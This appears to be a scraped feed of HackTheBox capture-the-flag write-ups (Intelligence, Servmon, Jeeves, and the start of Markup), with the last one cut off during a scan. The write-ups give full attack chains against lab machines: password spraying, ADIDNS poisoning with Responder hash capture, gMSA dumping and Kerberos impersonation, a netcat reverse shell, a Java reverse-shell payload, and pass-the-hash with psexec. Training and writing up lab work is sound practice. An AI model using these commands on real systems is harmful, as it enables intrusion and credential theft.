EST Nmap scan report for 10.129.95.154 Host is up (0.12s latency). Not shown: 996 open|filtered udp ports (no-response) PORT STATE SERVICE 53/udp open domain **88/udp open kerberos-sec** 123/udp open ntp **389/udp open ldap** Nmap done: 1 IP address (1 host up) scanned in 1.17 second Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 15:35 EST Nmap scan report for 10.129.95.154 Host is up (0.35s latency). Not shown: 65517 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus **80/tcp open http Microsoft IIS httpd 10.0** | http-methods: |_ Potentially risky methods: TRACE **|_http-title: Intelligence** |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 03:36:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn **389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)** |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. **| ssl-cert: Subject: commonName=dc.intelligence.htb** | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Not valid before: 2021-04-19T00:43:16 |_Not valid after: 2022-04-19T00:43:16 |_ssl-date: 2026-03-04T03:37:38+00:00; +7h00m00s from scanner time. 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc Microsoft Windows RPC 49711/tcp open msrpc Microsoft Windows RPC 49717/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-04T03:37:05 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 686.57 ms 10.10.14.1 2 686.72 ms 10.129.95.154 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 116.64 seconds Hosts # Lets add to our hosts file first\nDirbusting # SMB # Port 80 # Exploitation # so there is a palce where we can see the documents\nim gonna try and see if anything reveals a sensitive one\nlets generate dates with this python file\nimport datetime start = datetime.date(2020,1,1) timelapse = 1080 # Dates from 2020-01-01 to 2022-12-31 dates = [] for day in range(timelapse): d = (start + datetime.timedelta(days = day)).isoformat() dates.append(d) with open(\u0026#34;dates.txt\u0026#34;, \u0026#34;w\u0026#34;) as f: for d in dates: f.write(d + \u0026#39;\\n\u0026#39;) print(\u0026#34;Dates successfully generated !\u0026#34;) lets use ffuf now to enumerate the right responses\nffuf -ic -c -w dates.txt -u http://intelligence.htb/documents/FUZZ-upload.pdf -mc all -fc 404 great now lets downlaod them nd exif tool\n└─$ awk \u0026#39;{ print $1 }\u0026#39; dates.txt \u0026gt; vdates.txt great now lets\nfor d in $(cat vdates.txt); do curl -s -O \u0026#34;http://intelligence.htb/documents/$d-upload.pdf\u0026#34;; done lets convert them into text and check for anything interesting\nfor pdf_file in $(ls); do pdftotext $pdf_file; done now lets grab anything intersting\nnice so we have a default password NewIntelligenceCorpUser9876\nlets grab the usernames w the exiftool\nexiftool *.pdf | grep Creator | awk -F\u0026#39;: \u0026#39; \u0026#39;{ print $2 }\u0026#39; we should be able to now spray the password against these\nWilliam.Lee Scott.Scott Jason.Wright Veronica.Patel Jennifer.Thomas Danny.Matthews David.Reed Stephanie.Young Daniel.Shelton Jose.Williams John.Coleman Jason.Wright Jose.Williams Daniel.Shelton Brian.Morris Jennifer.Thomas Thomas.Valenzuela Travis.Evans Samuel.Richardson Richard.Williams David.Mcbride Jose.Williams John.Coleman William.Lee Anita.Roberts Brian.Baker Jose.Williams David.Mcbride Kelly.Long John.Coleman Jose.Williams Nicole.Brock Thomas.Valenzuela David.Reed Kaitlyn.Zimmerman Jason.Patterson Thomas.Valenzuela David.Mcbride Darryl.Harris William.Lee Stephanie.Young David.Reed Nicole.Brock David.Mcbride William.Lee Stephanie.Young John.Coleman David.Wilson Scott.Scott Teresa.Williamson John.Coleman Veronica.Patel John.Coleman Samuel.Richardson Ian.Duncan Nicole.Brock William.Lee Jason.Wright Travis.Evans David.Mcbride Jessica.Moody Ian.Duncan Jason.Wright Richard.Williams Tiffany.Molina Jose.Williams Jessica.Moody Brian.Baker Anita.Roberts Teresa.Williamson Kaitlyn.Zimmerman Jose.Williams Stephanie.Young Samuel.Richardson Tiffany.Molina Ian.Duncan Kelly.Long Travis.Evans Ian.Duncan Jose.Williams David.Wilson Thomas.Hall Ian.Duncan Jason.Patterson Stephanie.Young Kaitlyn.Zimmerman Travis.Evans Kelly.Long Danny.Matthews Travis.Evans Jessica.Moody Thomas.Valenzuela Anita.Roberts Stephanie.Young David.Reed Jose.Williams Veronica.Patel Ian.Duncan Richard.Williams Great we got our first pair of creds as Tiffany.Molina:NewIntelligenceCorpUser9876\nlets also do aseproasting and kerberoasting\nRoasting # No entries, well lets move on to enumerating the share then first\nSMB # We can read some shares lets check them out\nthere is another user we discover here\nmb: \\\u0026gt; dir . DR 0 Sun Apr 18 21:20:26 2021 .. DR 0 Sun Apr 18 21:20:26 2021 Administrator D 0 Sun Apr 18 20:18:39 2021 All Users DHSrn 0 Sat Sep 15 03:21:46 2018 Default DHR 0 Sun Apr 18 22:17:40 2021 Default User DHSrn 0 Sat Sep 15 03:21:46 2018 desktop.ini AHS 174 Sat Sep 15 03:11:27 2018 Public DR 0 Sun Apr 18 20:18:39 2021 Ted.Graves D 0 Sun Apr 18 21:20:26 2021 Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021 3770367 blocks of size 4096. 1401864 blocks available Found this file\nTry \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; dir . D 0 Sun Apr 18 20:50:55 2021 .. D 0 Sun Apr 18 20:50:55 2021 downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021 3770367 blocks of size 4096. 1401864 blocks available smb: \\\u0026gt; get downdetector.ps1 getting file \\downdetector.ps1 of size 1046 as downdetector.ps1 (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec) smb: \\\u0026gt; Lets see whats it about\n─$ cat downdetector.ps1 ��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem \u0026#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; | Where-Object Name -like \u0026#34;web*\u0026#34;) { try { $request = Invoke-WebRequest -Uri \u0026#34;http://$($record.Name)\u0026#34; -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -To \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -Subject \u0026#34;Host: $($record.Name) is down\u0026#34; } } catch {} } another mention of Ted.Graves\nhe is not roastable\nhmm lets grab everything on bloodhound\ncouldnt find anything useful so i started looking at the dns records because of that file we found\nLateral Movement On the IT share we find a script called downdetector.ps1 : We review the source code: The script loops through DNS records and sends an authenticated request to any host having a name starting with web in order to check its status. We can leverage the permission (granted by default to authenticated users) to create arbitrary DNS records on the Active Directory Integrated DNS (ADIDNS) zone to add a new record that points to our own IP address. This can be accomplished using the dnstool.py script from krbrelayx\nhad to refer and lets try this\ndnstool.py -u \u0026#39;intelligence\\Tiffany.Molina\u0026#39; -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web1 -d 10.10.14.137 -t A Now lets get our responder running and see if we can intercept the request\nresponder -I tun0 -A and boom we have our hash\nAnalyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details. [+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned. [HTTP] NTLMv2 Client : 10.129.95.154 [HTTP] NTLMv2 Username : intelligence\\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:8633d8e35352f77a:DBFBF406F23A608DCF7998C6CFE6EE22:010100000000000004DA3D5E30ACDC013D6A5E0B5263E4350000000002000800560039004100360001001E00570049004E002D004500370038004600360059004C0034003600450050000400140056003900410036002E004C004F00430041004C0003003400570049004E002D004500370038004600360059004C0034003600450050002E0056003900410036002E004C004F00430041004C000500140056003900410036002E004C004F00430041004C000800300030000000000000000000000000200000CBB9A4ECB2BB44F4837C16B60D592087EF8510D27DF64478FCEE56DC3AC921560A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 on cracking it with john we get\n**Mr.Teddy** Shell As Administrator # now lets see\nhmm i think we can try getting the service account nd then escalating to admin\nlets just use that\n$ python gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.129.95.154 Users or groups who can read password for svc_int$: \u0026gt; DC$ \u0026gt; itsupport svc_int$:::d5538dca5ba2ff329c9df39ef130f439 svc_int$:aes256-cts-hmac-sha1-96:8895ba258759c7fa94d7e7acd256f1d47dffe6783129f8f3785ba1634379c39e svc_int$:aes128-cts-hmac-sha1-96:1ebe879f3ecb1169f32413d9a8ebc7a6 Impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :d5538dca5ba2ff329c9df39ef130f439 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache now we can use it with wimi\nexport KRB5CCNAME=Administrator.ccache ┌──(kali㉿kali)-[~/Desktop/Tools/ACTIVEDIRECTORY] └─$ impacket-wmiexec -k -no-pass dc.intelligence.htb ","date":"4 March 2026","externalUrl":null,"permalink":"/ctf-writeups/intelligence/","section":"CTF Writeups","summary":"","title":"Intelligence","type":"ctf-writeups"},{"content":" Servmon # Overview # OS: Windows IP: 10.129.95.122 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access via path traversal and then port forwarded w ssh, api broken cant get root.txt.\nLoot # Loot Category Details Usernames Nadine, Nathan Passwords 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5!\nB3WithM30r4ga1n5tMe\nL1k3B1gBut7s@W0rk\n0nly7h3y0unGWi11F0l10w\nIfH3s4b0Utg0t0H1sH0me\nGr4etN3w5w17hMySk1Pa5$\new2x6SsGTxjRwXOT | | Usernames+Passwords | Nadine:L1k3B1gBut7s@W0rk | | Hashes | | | Service Versions | |\nEnumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-03 06:02 EST Nmap scan report for 10.129.227.77 Host is up (0.12s latency). Not shown: 991 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT **| ftp-anon: Anonymous FTP login allowed (FTP code 230)** |_02-28-22 06:35PM \u0026lt;DIR\u0026gt; Users **22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)** | ssh-hostkey: | 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA) | 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA) |_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519) **80/tcp open http** |_http-title: Site doesn\u0026#39;t have a title (text/html). | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | \u0026lt;!DOCTYPE html PUBLIC \u0026#34;-//W3C//DTD XHTML 1.0 Transitional//EN\u0026#34; \u0026#34;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\u0026#34;\u0026gt; | \u0026lt;html xmlns=\u0026#34;http://www.w3.org/1999/xhtml\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; | \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; | window.location.href = \u0026#34;Pages/login.htm\u0026#34;; | \u0026lt;/script\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? **8443/tcp open ssl/https-alt** | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs |_ssl-date: TLS randomness does not represent time **| http-title: NSClient++** |_Requested resource was /index.html 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.95%I=7%D=3/3%Time=69A6BFC3%P=x86_64-pc-linux-gnu%r(NULL, SF:6B,\u0026#34;HTTP/1\\.1\\x20408\\x20Request\\x20Timeout\\r\\nContent-type:\\x20text/htm SF:l\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n\\ SF:r\\n\u0026#34;)%r(GetRequest,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text SF:/html\\r\\nContent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x2 SF:0\\r\\n\\r\\n\\xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XH SF:TML\\x201\\.0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DT SF:D/xhtml1-transitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.o SF:rg/1999/xhtml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x SF:20\\x20\\x20\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20 SF:\\x20\\x20\\x20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;)% SF:r(HTTPOptions,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text/html SF:\\r\\nContent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n SF:\\r\\n\\xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XHTML\\x SF:201\\.0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DTD/xht SF:ml1-transitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.org/19 SF:99/xhtml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x20\\x2 SF:0\\x20\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20\\x20\\ SF:x20\\x20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;)%r(RTS SF:PRequest,1B4,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nContent-type:\\x20text/html\\r\\nC SF:ontent-Length:\\x20340\\r\\nConnection:\\x20close\\r\\nAuthInfo:\\x20\\r\\n\\r\\n\\ SF:xef\\xbb\\xbf\u0026lt;!DOCTYPE\\x20html\\x20PUBLIC\\x20\\\u0026#34;-//W3C//DTD\\x20XHTML\\x201\\. SF:0\\x20Transitional//EN\\\u0026#34;\\x20\\\u0026#34;http://www\\.w3\\.org/TR/xhtml1/DTD/xhtml1-t SF:ransitional\\.dtd\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;html\\x20xmlns=\\\u0026#34;http://www\\.w3\\.org/1999/xh SF:tml\\\u0026#34;\u0026gt;\\r\\n\u0026lt;head\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;title\u0026gt;\u0026lt;/title\u0026gt;\\r\\n\\x20\\x20\\x20\\x20 SF:\u0026lt;script\\x20type=\\\u0026#34;text/javascript\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2 SF:0window\\.location\\.href\\x20=\\x20\\\u0026#34;Pages/login\\.htm\\\u0026#34;;\\r\\n\\x20\\x20\\x20\\x SF:20\u0026lt;/script\u0026gt;\\r\\n\u0026lt;/head\u0026gt;\\r\\n\u0026lt;body\u0026gt;\\r\\n\u0026lt;/body\u0026gt;\\r\\n\u0026lt;/html\u0026gt;\\r\\n\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=3/3%Time=69A6BFCC%P=x86_64-pc-linux-gnu SF:%r(GetRequest,74,\u0026#34;HTTP/1\\.1\\x20302\\r\\nContent-Length:\\x200\\r\\nLocation: SF:\\x20/index\\.html\\r\\n\\r\\n\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\ SF:0\\0\\0\\0\\0\\0\\x12\\x02\\x18\\0\\x1aC\\n\\x07workers\\x12\\n\\n\\x04jobs\\x12\\x02\\x18 SF:\\x0b\\x12\\x0f\u0026#34;)%r(HTTPOptions,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length:\\x2 SF:018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;)%r(FourOhFourRequest,36,\u0026#34;HTTP/1\\.1 SF:\\x20404\\r\\nContent-Length:\\x2018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;)%r(RT SF:SPRequest,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length:\\x2018\\r\\n\\r\\nDocument SF:\\x20not\\x20found\u0026#34;)%r(SIPOptions,36,\u0026#34;HTTP/1\\.1\\x20404\\r\\nContent-Length: SF:\\x2018\\r\\n\\r\\nDocument\\x20not\\x20found\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: -1s | smb2-time: | date: 2026-03-03T11:04:56 |_ start_date: N/A TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 114.12 ms 10.10.14.1 2 114.31 ms 10.129.227.77 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 179.12 seconds Dirbusting # Nothing w dirbuster on the other one either, anways lets come back here if we get stuck\nPort 21 # Since FTP was open with anon login lets check it out\nwe find the users Nadine Nathan lets add them to our users.txt\nNadine had a confidential txt\nNathan, **I left your Passwords.txt file on your Desktop.** Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine So nathan has a passwords txt file on his desktop interesting, we might have to get thru nathan first then\nand Nathan had a todo list\n1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint and the secret files are apparently in some sharepoint\nSubd # No subdomains either\nPort 80 # Port 8443 # Exploitation # So this service apparently has a LFI exploit\nlemme use this to try nd grab the passwords.txt file\nAHHH lets go thru others\nwell it worked manually…\ngreat now lets use this w the user list against the ssh port\nshell access\nShell as Nadine # No interesting privs\ni only have access to nadines folder… lets see if we find anything interesting here\nlooking at ncs++ in the programs folder we are able to find a .ini config file with this password\nlets see if we can use it for nathan\nand we have the version also\nnadine@SERVMON C:\\Program Files\\NSClient++\u0026gt;nscp --version NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64 Not able to login tho\nApparently only the localhost is allowed, so we might have to do some portforwarding\nlets tunnel w ssh\nsshpass -p \u0026#39;L1k3B1gBut7s@W0rk\u0026#39; ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443 , basically 127.0.0.1:8443 on the first port lets get shell.bat and nc over on the system\nshell.bat\n\\programdata\\nc.exe 10.10.14.24 443 -e cmd Settings \u0026gt; external scripts \u0026gt; scripts, and then “+Add new”.\n","date":"3 March 2026","externalUrl":null,"permalink":"/ctf-writeups/servmon/","section":"CTF Writeups","summary":"","title":"Servmon","type":"ctf-writeups"},{"content":" Jeeves # Overview # OS: Windows IP: 10.129.228.112 Difficulty: Medium OSCP: Yes Lists: N/A Summary # Got in thru exposed jenkins interface, privesc using hash found thru keepass.\nLoot # Loot Category Details Usernames Passwords moonshine1 Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION **80/tcp open http Microsoft IIS httpd 10.0** |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves | http-methods: |_ Potentially risky methods: TRACE **135/tcp open msrpc Microsoft Windows RPC** **445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)** **50000/tcp open http Jetty 9.4.z-SNAPSHOT** |_http-title: Error 404 Not Found **|_http-server-header: Jetty(9.4.z-SNAPSHOT)** Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 2008|7|10|Phone|Vista|2012|11 (91%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_11 Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows 11 (85%), Microsoft Windows Embedded Standard 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops **Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows** Host script results: | smb-security-mode: **| account_used: guest** | authentication_level: user **| challenge_response: supported** |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2026-03-02T18:28:14 |_ start_date: 2026-03-02T18:27:00 |_clock-skew: mean: 5h00m00s, deviation: 0s, median: 5h00m00s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 165.38 ms 10.10.14.1 2 165.47 ms 10.129.228.112 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.50 seconds Dirbusting # SMB # we know smb is open and guest is supported so lets enumerate it first and grab the domain name as well\nstrange\nlets check the website\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPORT 50000 # None of the path traversal exploits seem to work, didnt have much to work w so i looked at the writeup and apparently i was supposed to use some raft wordlist nd come across a page weird\nExploitation # askjeeves # I validated this step using the evidence below before moving forward in the chain.\nString host=\u0026#34;10.10.14.137\u0026#34;;int port=1234;String cmd=\u0026#34;sh\u0026#34;;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u0026gt;0)so.write(pi.read());while(pe.available()\u0026gt;0)so.write(pe.read());while(si.available()\u0026gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); and we are in\nshell as kohsuke # nice, we can use printspoofer\nlets try it\naand this didnt work nor did God potato so i think its another loophole\nwe grab this kdbx file\nso i was able to crack the password\nmoonshine1\nTitle: Backup stuff Uname: ? Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 URL: Notes: kpcli:/CEH\u0026gt; show -f 1 Title: Bank of America Uname: Michael321 Pass: 12345 URL: https://www.bankofamerica.com Notes: kpcli:/CEH\u0026gt; show -f 2 Title: DC Recovery PW Uname: administrator Pass: S1TjAtJHKsugh9oC4VZl URL: Notes: kpcli:/CEH\u0026gt; show -f 3 Title: EC-Council Uname: hackerman123 Pass: pwndyouall! URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh Notes: Personal login kpcli:/CEH\u0026gt; show -f 4 Title: It\u0026#39;s a secret Uname: admin Pass: F7WhTrSFDKB6sxHU1cUn URL: http://localhost:8180/secret.jsp Notes: kpcli:/CEH\u0026gt; show -f 5 Title: Jenkins admin Uname: admin Pass: URL: http://localhost:8080 Notes: We don\u0026#39;t even need creds! Unhackable! lets use the first one to PTH and get administrator shell\n└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.129.228.112 cmd.exe aand we are in\nlets check the datastream\ndir /R\nmore \u0026lt; hm.txt:root.txt ","date":"2 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jeeves/","section":"CTF Writeups","summary":"","title":"Jeeves","type":"ctf-writeups"},{"content":" Markup # Overview # OS: Windows IP: 10.129.92.142 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # XXE.\nLoot # Loot Category Details Usernames admin Passwords password Usernames+Passwords admin:password Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-02 06:19 CST Nmap scan report for 10.129.95.192 Host is up (0.0082s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA) | 256 